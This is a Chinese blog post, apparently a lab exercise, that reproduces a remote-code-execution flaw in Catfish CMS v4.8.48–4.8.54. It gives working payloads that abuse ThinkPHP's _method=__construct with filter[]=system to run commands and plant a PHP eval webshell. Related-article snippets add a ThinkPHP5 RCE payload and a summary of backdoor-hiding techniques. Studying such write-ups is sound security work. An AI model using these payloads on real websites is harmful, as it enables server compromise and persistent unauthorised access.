catfish V4.8.48-4.8.54 前台getshell复现过程

最新推荐文章于 2024-07-10 18:43:48 发布
最新推荐文章于 2024-07-10 18:43:48 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: 练题 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45821250/article/details/121913618
版权

在这里插入图片描述
s=dir&filter[]=system&_method=__construct&method=*
在这里插入图片描述
s=echo “<?php @eval($_POST['attack']);?>” >camd.php&filter[]=system&_method=__construct&method=*
在这里插入图片描述
原理就是网站代码在设计时有两个函数可以相互传值,可以间接的把 __construct():构造函数/方法直接传进去执行,你看payload为什么会直接执行黑进去,就是因为在_method这个魔术常量没有审计用户会调用值进去。

看教程时几个关键点的知识点:
$user->friends_count
取对象的friends_count属性。

$t->homeTimeline($p)
调用对象的homeTimeline方法,方法中传入一个参数$p

if我是菜鸡
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Catfish CMS 鲶鱼内容管理系统 v4.8.54
10-04
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
CatfishCMS任意命令执行导致getshell
云雕的博客
06-08 4871
CatfishCMS任意命令执行导致getshell目录一、 漏洞说明二、 漏洞测试三、漏洞修复: 目录 测试环境:windows + php5.4.45 +apache (phpStudy 集成环境) CMS 版本: v4.8.54(发布于2019年1月) 一、 漏洞说明 完整的payload为: s=dir&_method=__construct&method=*&fi...
Catfishcms v4.8.54环境搭建
小小猪的博客
12-21 472
Catfishcms v4.8.54环境搭建 源码下载: 链接:https://pan.baidu.com/s/1bitRu4triNjKTUHSgAB-Xg 提取码:c2ac phpstudy这里就不在讲述了,自行百度下载 将下载好的源码放进安装好后的phpstudy文件的WWW目录下 127.0.0.1+你解压之后的文件名即可进行安装 安装成功 前台界面 后台界面 ...
Catfishcms漏洞复现
小小猪的博客
12-21 1655
Catfishcms漏洞复现 环境搭建: Catfishcms v4.8.54环境搭建 漏洞复现: 代码审计: _method=__construct Request类(catfish/library/think/Request.php)用于处理请求,函数method用于获取请求的类型 application/config.php 中定义了“表单请求类型伪装变量”: POST请求参数 “ _method=__construct ”,将 __construct 传给了var_metho.
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7003
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
Catfish(鲶鱼) CMS v4.8.48
10-05
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
Catfish(鲶鱼) CMS v4.8.75
10-01
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
Catfish(鲶鱼) CMS v4.8.45
10-05
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
Catfish(鲶鱼) CMS v4.8.27
10-09
Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统,适合于CMS、Blog、企业站等不同类型的网站建设。 自动识别CMS、Blog 等网站类型,只要简单的切换主题就可以完成网站类型的切换。 多语言
Catfish CMS漏洞集合
weixin_30455661的博客
04-08 1444
转自https://larryxi.github.io/ 0x00 背景 版本:V 4.2.35 官网下载:http://www.catfish-cms.com/page/4.html 文章内容仅作学习参考,勿以恶小而为 0x01 任意文件删除 拿到一个cms进行安装后,首先比较喜欢看看其安装逻辑,查找有没有在安装流程中直接导致重装的可能性。由于系统是THINKPHP5开发的,...
利用CMS漏洞渗透并获取某服务器权限
热门推荐
wodafa的博客
03-14 1万+
phpmyadmin漏洞与利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐号和密码,但无法执行load_file或者说无法导出webshell到服务器上,在这种情况下就需要充分利用既有CMS漏洞,通过CMS漏洞来获取webshell。目前使用流行架构,特别是一键式部署的系统
thinkphp5 RCE漏洞复现
feng的博客
03-03 3403
前言 之前看的是tp3的SQL注入,现在开始审计一下tp5的一些SQL注入和RCE。先看一下RCE,毕竟thinkphp最广为人知的漏洞就是RCE。 首先是源码的下载,我从这里下载: thinkphp下载 这里我下载的是thinkphp5.0.22完整版,如果下载核心版的话可能会有一些代码的缺失。 debug模式开启下的RCE 和之前tp5.1的反序列化一样,RCE的执行点也都是重要的request类。关键在于这个filterValue()函数: /** * 递归过滤给定的值 * @param mixe
thinkPHP5 最新代码执行漏洞
xiaoziabc的博客
01-13 2804
s=captcha _method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_method]=dir   http://127.0.0.1/tp5.0.12_full/public/index.php?s=index/\think\app/invokefunction&amp;function=call...
php隐藏后门,php如何隐藏后门
weixin_39603598的博客
03-09 262
php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名在 Windows 10下...
鲶鱼java代码_Catfish(鲶鱼) Blog V1.3.15 代码审计
weixin_33246767的博客
02-26 362
Catfish(鲶鱼) Blog V1.3.15 代码审计1,前台存储型xss漏洞漏洞点:application\index\controller\index.php调用了filterJs函数对content 参数进行过滤。继续跟进filterJs函数:在/application/index/controller/Common.php文件中filterJs函数定义如下:protected func...
PHP代码审计——越权漏洞(Catfish(鲶鱼) CMS
W小哥
08-20 2713
一、代码审计 第一处越权 把id传递过来,进行一个where查询,没有验证用户直接查询 通过查询id值,可以查询不同用户的文章 第一处漏洞复现 首先在后台创建一个用户test01,然后以test01的身份登陆后台,编辑一篇测试文章 test01查看自己的测试文章,发现id的值为3 测试,将id修改为1、2,可以编辑admin账户的文章 第二处越权 通过get方式接收art参数的值,之后将art的值赋值给wzid,然后将id=wzid的值代入数据库select查询,也是没有验证用户的身份 第二处漏
什么是RPC?有哪些RPC框架?
yuiezt的专栏
07-09 1846
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
PHP编程开发工具有哪些?
最新发布
红客网络编程与渗透技术
07-10 1017
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
常用的 shell 命令有: 1. ls - 列出目录中的文件和文件夹 2. cd - 更改当前工作目录 3. pwd - 显示当前工作目录的完整路径 4. cp - 复制文件或目录 5. mv - 移动或重命名文件或目录 6. rm - 删除文件或目录 7. echo - 向控制台输出文本 8. cat - 显示文件内容 9. mkdir - 创建目录 10. touch - 创建空文件 这只是常用的几个命令,还有许多其他命令可以满足不同的需求。
07-15
感谢你提供的常用的shell命令。除了这些常见的命令,还有一些其他常用的命令可以进一步扩展你的命令行工具的功能。这些命令包括: 11. grep - 在文件中搜索匹配的文本 12. find - 在目录中查找文件 13. chmod - ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值